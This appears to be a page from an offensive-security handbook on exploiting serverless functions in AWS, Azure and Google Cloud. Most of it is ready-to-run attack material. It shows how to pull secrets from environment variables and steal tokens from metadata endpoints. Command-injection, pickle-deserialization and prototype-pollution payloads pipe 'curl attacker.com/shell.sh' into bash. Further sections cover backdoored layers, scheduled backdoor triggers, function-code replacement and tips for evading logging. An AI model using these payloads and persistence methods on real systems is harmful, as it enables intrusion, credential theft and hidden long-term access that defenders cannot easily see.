Serverless Security

Overview

Serverless computing (Functions as a Service) introduces unique security challenges. This section covers exploitation techniques for AWS Lambda, Azure Functions, and Google Cloud Functions.

AWS Lambda

Enumeration

# List Lambda functions
aws lambda list-functions --region us-east-1

# Get function details
aws lambda get-function --function-name <function-name>

# Get function configuration (env vars may contain secrets)
aws lambda get-function-configuration --function-name <function-name>

# List event source mappings
aws lambda list-event-source-mappings

# Get function policy
aws lambda get-policy --function-name <function-name>

# List layers (shared code/dependencies)
aws lambda list-layers
aws lambda get-layer-version --layer-name <layer-name> --version-number <version>

Lambda Environment Variables

# Environment variables often contain:
# - Database connection strings
# - API keys
# - AWS credentials (though IAM roles are preferred)
# - Encryption keys

# Extract from compromised function
aws lambda get-function-configuration --function-name <name> --query 'Environment.Variables'

# Common sensitive variable names
# DB_PASSWORD, API_KEY, SECRET_KEY, AWS_ACCESS_KEY_ID, JWT_SECRET, ENCRYPTION_KEY

Lambda IAM Role Abuse

# Lambda functions have IAM roles attached
# If overly permissive, can be abused

# Get the execution role
aws lambda get-function --function-name <name> --query 'Configuration.Role'

# Check what the role can do
aws iam get-role-policy --role-name <role-name> --policy-name <policy-name>
aws iam list-attached-role-policies --role-name <role-name>

# If you can invoke the function, use it to:
# - Access S3 buckets
# - Query DynamoDB
# - Call other AWS services
# - Pivot to other resources

Event Injection

# Lambda can be triggered by various events
# Injecting malicious payloads into event sources

# API Gateway (HTTP trigger)
curl -X POST https://api.execute-api.region.amazonaws.com/prod/function \
  -d '{"__proto__": {"admin": true}}'

# S3 trigger - upload malicious file
# Filename with command injection
aws s3 cp malicious.txt "s3://bucket/; curl attacker.com/shell.sh | bash #.txt"

# SNS/SQS - inject malicious message
aws sns publish --topic-arn arn:aws:sns:region:account:topic \
  --message '{"command": "$(curl attacker.com/shell.sh | bash)"}'

# CloudWatch Events - if you can create rules
aws events put-rule --name "backdoor" --schedule-expression "rate(5 minutes)"

Cold Start Information Disclosure

# Lambda containers are reused
# Previous invocation data might persist in /tmp

# In malicious function code:
import os
# List /tmp contents
print(os.listdir('/tmp'))
# Read previous files
for f in os.listdir('/tmp'):
    print(open(f'/tmp/{f}').read())

Lambda Layer Attacks

# Layers are shared code across functions
# If you can modify a layer, you compromise all functions using it

# List layers a function uses
aws lambda get-function --function-name <name> --query 'Configuration.Layers'

# If you have lambda:PublishLayerVersion
# Create malicious layer with backdoored dependencies

# Dependency confusion in layers
# If function imports from layer, create malicious package

Azure Functions

Enumeration

# List Function Apps
az functionapp list --output table

# Get function app details
az functionapp show --name <app-name> --resource-group <rg>

# List functions in app
az functionapp function list --name <app-name> --resource-group <rg>

# Get app settings (environment variables)
az functionapp config appsettings list --name <app-name> --resource-group <rg>

# Get connection strings
az functionapp config connection-string list --name <app-name> --resource-group <rg>

# Get function keys
az functionapp function keys list --name <app-name> --resource-group <rg> --function-name <function>

Managed Identity Exploitation

# From inside compromised function, get tokens
curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \
  "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://management.azure.com/"

# Use token for Azure management
az login --identity
az resource list

# Access Key Vault
curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \
  "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://vault.azure.net/"

Kudu Console Access

# Kudu provides debug console for Azure App Service/Functions
# https://<app-name>.scm.azurewebsites.net

# If you have deployment credentials:
# - Browse file system
# - Execute commands via Debug Console
# - Download function source code
# - View environment variables

# Download entire site
curl -u 'username:password' https://<app-name>.scm.azurewebsites.net/api/zip/site/wwwroot/ -o site.zip

HTTP Trigger Vulnerabilities

# Check for unauthenticated triggers
curl https://<app>.azurewebsites.net/api/<function>

# Authorization levels:
# - anonymous: No key required
# - function: Function-specific key
# - admin: Master key only

# If you find function key, use it:
curl "https://<app>.azurewebsites.net/api/<function>?code=<function-key>"

Google Cloud Functions

Enumeration

# List functions
gcloud functions list

# Describe function
gcloud functions describe <function-name> --region <region>

# Get IAM policy
gcloud functions get-iam-policy <function-name> --region <region>

# View source (if you have access)
gcloud functions describe <function-name> --format='value(sourceArchiveUrl)'

# List environment variables
gcloud functions describe <function-name> --format='value(environmentVariables)'

Service Account Abuse

# GCF uses service accounts
# From inside function, access metadata server

curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

# Use token
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | jq -r '.access_token')

curl -H "Authorization: Bearer $TOKEN" \
  "https://storage.googleapis.com/storage/v1/b?project=<project-id>"

Pub/Sub Event Injection

# If function is triggered by Pub/Sub
# Inject malicious messages

gcloud pubsub topics publish <topic> --message '{"payload": "malicious"}'

# If you control the publisher, inject arbitrary data

Common Vulnerabilities

Insecure Deserialization

# Lambda/Functions often deserialize input
# Python pickle, Java serialization, Node.js

# Python pickle RCE
import pickle
import base64

class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ('curl attacker.com/shell.sh | bash',))

payload = base64.b64encode(pickle.dumps(Exploit())).decode()
# Send as input to vulnerable function

SSRF via Functions

# Functions often make HTTP requests
# Use to access internal services

# AWS metadata
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}

# Azure metadata
{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}

# GCP metadata
{"url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"}

# Internal services
{"url": "http://internal-api.local/admin"}

Prototype Pollution (Node.js)

// Many serverless functions use Node.js
// Prototype pollution can lead to RCE

// Malicious input
{
  "__proto__": {
    "shell": "/bin/bash",
    "NODE_OPTIONS": "--require /proc/self/environ"
  }
}

// Or
{
  "constructor": {
    "prototype": {
      "env": {"AAAA": "require('child_process').exec('curl attacker.com')"}
    }
  }
}

Command Injection

# Functions often execute system commands
# Inject via input parameters

# Common injection points:
# - Filename parameters
# - URL parameters
# - User-supplied commands

# Examples
{"filename": "file.txt; curl attacker.com/shell.sh | bash"}
{"command": "ls -la $(curl attacker.com/shell.sh | bash)"}
{"url": "http://example.com`id`"}

Dependency Vulnerabilities

# Serverless functions use third-party dependencies
# Vulnerable dependencies = vulnerable function

# Check for known vulnerabilities
# Node.js
npm audit
snyk test

# Python
pip-audit
safety check

# Look for outdated runtime versions
# Lambda supports multiple Python/Node versions
# Older versions may have known vulnerabilities

Persistence Techniques

Lambda Layers for Persistence

# Create malicious layer
# Intercept function calls or add backdoor

# Create layer with backdoored dependency
mkdir -p python/lib/python3.9/site-packages/
# Add malicious code to a common dependency
zip -r layer.zip python/

aws lambda publish-layer-version \
  --layer-name "requests-layer" \
  --zip-file fileb://layer.zip \
  --compatible-runtimes python3.9

Event Source Persistence

# Create persistent triggers

# AWS - CloudWatch Events
aws events put-rule --name "backdoor" \
  --schedule-expression "rate(1 hour)"
aws events put-targets --rule "backdoor" \
  --targets "Id"="1","Arn"="arn:aws:lambda:region:account:function:backdoor"

# Azure - Timer trigger
# Deploy function with timer trigger

# GCP - Cloud Scheduler
gcloud scheduler jobs create http backdoor \
  --schedule="0 * * * *" \
  --uri="https://region-project.cloudfunctions.net/backdoor"

Function Code Modification

# Modify function code to include backdoor

# AWS
aws lambda update-function-code \
  --function-name <function-name> \
  --zip-file fileb://backdoored.zip

# Azure
az functionapp deployment source config-zip \
  --name <app-name> \
  --resource-group <rg> \
  --src backdoored.zip

# GCP
gcloud functions deploy <function-name> \
  --source=./backdoored-code

Detection Evasion

# Minimize logging
# AWS - Don't use console.log/print in malicious code
# Azure - Avoid Application Insights triggers
# GCP - Don't write to stdout for sensitive operations

# Use legitimate-looking function names
# "data-processor", "auth-handler", "log-aggregator"

# Blend with normal traffic patterns
# Don't make unusual API calls
# Match expected execution times

# Clean up /tmp after exploitation
rm -rf /tmp/*

Tools

# Serverless Security Scanner
# https://github.com/puresec/serverless-security
serverless-security scan

# SLS-Dev-Tools
# https://github.com/Theodo-UK/sls-dev-tools
sls-dev-tools

# Prowler (AWS)
prowler -c lambda

# ScoutSuite (multi-cloud)
scout aws --services lambda
scout azure --services functionapps
scout gcp --services cloudfunctions

# SCAR - Serverless security scanner
# https://github.com/puresec/scar

Resources

PreviousDocker && Kubernetes NextCDN - Comain Fronting

Last updated 8 days ago

Was this helpful?

hashtagOverview

hashtagAWS Lambda

hashtagEnumeration

hashtagLambda Environment Variables

hashtagLambda IAM Role Abuse

hashtagEvent Injection

hashtagCold Start Information Disclosure

hashtagLambda Layer Attacks

hashtagAzure Functions

hashtagEnumeration

hashtagManaged Identity Exploitation

hashtagKudu Console Access

hashtagHTTP Trigger Vulnerabilities

hashtagGoogle Cloud Functions

hashtagEnumeration

hashtagService Account Abuse

hashtagPub/Sub Event Injection

hashtagCommon Vulnerabilities

hashtagInsecure Deserialization

hashtagSSRF via Functions

hashtagPrototype Pollution (Node.js)

hashtagCommand Injection

hashtagDependency Vulnerabilities

hashtagPersistence Techniques

hashtagLambda Layers for Persistence

hashtagEvent Source Persistence

hashtagFunction Code Modification

hashtagDetection Evasion

hashtagTools

hashtagResources

Overview

AWS Lambda

Enumeration

Lambda Environment Variables

Lambda IAM Role Abuse

Event Injection

Cold Start Information Disclosure

Lambda Layer Attacks

Azure Functions

Enumeration

Managed Identity Exploitation

Kudu Console Access

HTTP Trigger Vulnerabilities

Google Cloud Functions

Enumeration

Service Account Abuse

Pub/Sub Event Injection

Common Vulnerabilities

Insecure Deserialization

SSRF via Functions

Prototype Pollution (Node.js)

Command Injection

Dependency Vulnerabilities

Persistence Techniques

Lambda Layers for Persistence

Event Source Persistence

Function Code Modification

Detection Evasion

Tools

Resources